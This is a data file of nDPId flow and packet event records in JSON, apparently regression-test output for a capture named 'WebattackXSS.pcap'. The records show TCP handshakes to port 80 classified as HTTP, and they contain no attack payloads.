-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347015165,"flow_last_seen":1499347020614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347016455,"flow_last_seen":1499347021614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347017745,"flow_last_seen":1499347023616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347020329,"flow_last_seen":1499347025616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1538,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347021621,"flow_last_seen":1499347027616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347150241,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347151520,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347151520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82ilAAD4G66asEAABwKgKMtOEAFDVpkFaAAAAAKACchDXgQAAAgQFtAQCCAoBOZtzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1499347151520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347151520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ04RMTDZ61aZBW6AScSDkzQAAAgQFtAQCCAoD42zpATmbcwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":3,"flow_last_seen":1499347151521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347151521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02ipAAD4G662sEAABwKgKMtOEAFDVpkFbTEw2e4AQAOWD1QAAAQEICgE5m3MD42zp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347152786,"flow_last_seen":1499347152786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347152786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1499347152786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lJhAAD4GMTisEAABwKgKMtOSAFAXpgg3AAAAAKACchDNWwAAAgQFtAQCCAoBOZyvAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1499347152786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347152786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ05Ji9R5fF6YIOKAScSDa3AAAAgQFtAQCCAoD424mATmcrwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1499347152787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347152787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lJlAAD4GMT+sEAABwKgKMtOSAFAXpgg4YvUeYIAQAOV55AAAAQEICgE5nK8D424m"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347155346,"flow_last_seen":1499347155346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347155346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1499347155346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8btxAAD4GVvSsEAABwKgKMtOsAFCnAfHzAAAAAKACchBRqQAAAgQFtAQCCAoBOZ8vAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1499347155346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347155346,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ06xcmZfGpwHx9KAScSDpngAAAgQFtAQCCAoD43CmATmfLwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1499347155347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347155347,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bt1AAD4GVvusEAABwKgKMtOsAFCnAfH0XJmXx4AQAOWIpgAAAQEICgE5ny8D43Cm"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347156630,"flow_last_seen":1499347156630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347156630,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1499347156630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OChAAD4GjaisEAABwKgKMtO6AFAdhZhYAAAAAKACchAzcgAAAgQFtAQCCAoBOaBwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1499347156630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347156630,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ07o+DQO9HYWYWaAScSB8vAAAAgQFtAQCCAoD43HnATmgcAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1499347156631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347156631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OClAAD4Gja+sEAABwKgKMtO6AFAdhZhZPg0DvoAQAOUbxAAAAQEICgE5oHAD43Hn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347159323,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347159323,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ly1AAD4GlqOsEAABwKgKMtPUAFBviYw8AAAAAKACchDqzgAAAgQFtAQCCAoBOaMRAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347159323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ09Q7Unbob4mMPaAScSDBBwAAAgQFtAQCCAoD43SIATmjEQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1499347159323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347159323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ly5AAD4GlqqsEAABwKgKMtPUAFBviYw9O1J26YAQAOVgDgAAAQEICgE5oxID43SI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347160581,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160581,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eT9AAD4GTJGsEAABwKgKMtPiAFBG+91zAAAAAKACchDA3AAAAgQFtAQCCAoBOaRMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1499347160581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347160581,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0+J0ull0RvvddKAScSB55wAAAgQFtAQCCAoD43XCATmkTAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1499347160582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347160582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eUBAAD4GTJisEAABwKgKMtPiAFBG+910dLpZdYAQAOUY7wAAAQEICgE5pEwD43XC"} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347035750,"flow_last_seen":1499347041619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347038276,"flow_last_seen":1499347043619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="} 
